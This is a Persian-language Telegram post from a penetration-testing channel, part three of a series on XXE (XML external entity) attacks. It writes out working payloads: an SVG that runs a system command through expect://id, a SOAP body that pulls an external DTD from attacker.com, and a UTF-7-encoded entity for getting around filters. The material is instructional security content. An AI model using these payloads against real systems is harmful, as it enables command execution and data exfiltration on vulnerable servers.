Try Hack Box
4.87K subscribers
572 photos
63 videos
79 files
602 links
1 Nov 2020
1399/08/11
Learn penetration testing & Red Team
https://youtube.com/@tryhackbox
Channels :
@TryHackBoxOfficial ( RoadMap )
@TryHackBoxStory ( Story Hacking )
Contact : @Unique_exploitBot
ADS (Tablighat ) :
@THBADS
Download Telegram
📌 حملات XXE (تزریق XML) - بخش سوم 

🔹 حملات پیشرفته XXE (ادامه) 

4. استفاده از XXE در فایل‌های SVG (حملات از طریق تصاویر) 
فایل‌های SVG مبتنی بر XML هستند و می‌توانند حاوی payloadهای XXE باشند: 
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="300" height="200">
    <image xlink:href="expect://id"></image>
</svg>

اگر سایتی آپلود SVG را بدون فیلتر کردن اجازه دهد، این payload می‌تواند دستورات سیستم را اجرا کند. 

5. استفاده از XXE در پروتکل SOAP (سرویس‌های وب) 
در APIهای SOAP-based نیز می‌توان از XXE سوءاستفاده کرد: 
<soap:Body>
  <foo>
    <![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://attacker.com/"> %dtd;]><xxx/>]]>
  </foo>
</soap:Body>

این payload درخواستی به سرور مهاجم ارسال می‌کند. 

6. استفاده از کدگذاری UTF-7 برای دور زدن فیلترها 
بعضی سیستم‌ها فقط UTF-8 را پردازش می‌کنند، اما با UTF-7 می‌توان برخی فیلترها را دور زد: 
<?xml version="1.0" encoding="UTF-7"?>
+ADwAIQ-DOCTYPE foo+AFs +ADwAIQ-ELEMENT foo ANY +AD4
+ADwAIQ-ENTITY xxe SYSTEM +ACI-http://hacker.com/+ACI +AD4AXQA+
+ADw-foo+AD4AJg-xxe+ADsAPA-/foo+AD4


🔹 جمع‌بندی بخش سوم 
- درون SVGها می‌توانند حاوی XXE باشند. 
-حتی APIهای SOAP نیز در معرض خطرند. 
- با تغییر کدگذاری (مثل UTF-7) می‌توان برخی فیلترها را دور زد. 

ادامه در بخش چهارم (پیشگیری و دفاع)...

✍️نویسنده
@TryHackBox | The Chaos

#XXE #SVG #Payload #CyberSecurity
👍52